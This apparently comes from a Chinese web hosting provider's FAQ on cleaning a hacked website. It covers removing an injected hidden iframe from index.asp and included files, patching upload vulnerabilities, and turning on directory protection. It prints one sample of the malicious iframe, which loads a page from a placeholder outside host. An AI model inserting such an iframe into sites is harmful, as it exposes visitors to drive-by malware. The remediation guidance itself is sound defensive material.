访问网站时杀毒软件报警提示中了病毒怎么办？

　　问：访问我的网站时杀毒软件报警提示中了病毒怎么办？

　　答：这一般是因为您的网站中的某个程序有漏洞，被黑客上传木马后，修改了您的网站，在您的网页中添加了病毒代码所致。

　　解决办法：例如您是在访问/index.asp 这个网页时提示有病毒的，首先通过ftp登录，将这个文件下载到您本地。因为黑客只是杀入了一段代码，所以即使您用杀毒软件来扫描这个文件，杀毒软件也会认为没有病毒。这种情况需要手工删除病毒代码。

　　用记事本等工具打开下载回来的index.asp 文件。一般黑客会在这个文件尾部插入一段

《iframe id="baiduframe" border="0" vspace="0" hspace="0" marginwidth="0" marginheight="0"

framespacing="0" frameborder="0" scrolling="no" width="140" height="75"

src="http://www.xxxx.com/mm.htm";>

</iframe》 这样的代码，将之删除，保存，然后重新上传即可。



　　如果尾部没有，则可以先搜索iframe，然后再处理。

    如果搜索完了也没有，则代码可能隐藏在index.asp中调用的其他文件中，比如index.asp 在首部包含了conn.asp head.asp 。有时病毒代码也会隐藏在这些文件里面，按上面的办法下载这些文件并删除相关的代码即可。

    清除病毒后，还需找到您的网站漏洞所在，否则黑洞今后可能再次上传病毒代码; 如果您的网站使用了动网论坛、动易建站等程序，请将他们升级到最新版，或者到这些程序的官方网站上寻求解决方案。如果您是自己开发的程序，需要特别注意有文件上传功能的地方，动网、动网等程序曾经就发生过因为上传功能有漏洞，导致轻易被黑客入侵的情况。

    同时，我司的虚拟主机提供了目录保护功能，可以保护某些容易被人入侵的目录。详情请登录管理中心>业务管理>虚拟主机>管理>更多高级管理功能>目录保护。

下面是目录保护的一些介绍：

    通常用户网站被黑（如网页被篡改,文件被盗，被删等）都是因为黑客通过网站的文件上传功能将asp/php木马上传到空间并运行造成的。

　　所以在无法确认系统是否存在上传漏洞的情况下，只要保证文件上传目录没有脚本运行权限，那么即便黑客将木马上传到您的空间他也无法运行,这样就无法危及您的网站，使您网站更安全。



　　注意： 

　　1、现在仅提供Windows系列主机的目录保护,设置后的目录不能运行脚本程序。 

　　2、您最多可以设置5个目录。

　　3、具体上传目录您需要自行确定，若不清楚请咨询您网站的制作人员。

　　4、要取消脚本权限的目录必须存在，否则设置会失败。

　　5、添加的目录格式为/xxx/xxx

　　6、若是动网论坛，则共有两个上传目录，分别是UploadFace与UploadFile。

　　7、例:若您要保护wwwroot/bbs/UploadFace目录，则应该填写/bbs/UploadFace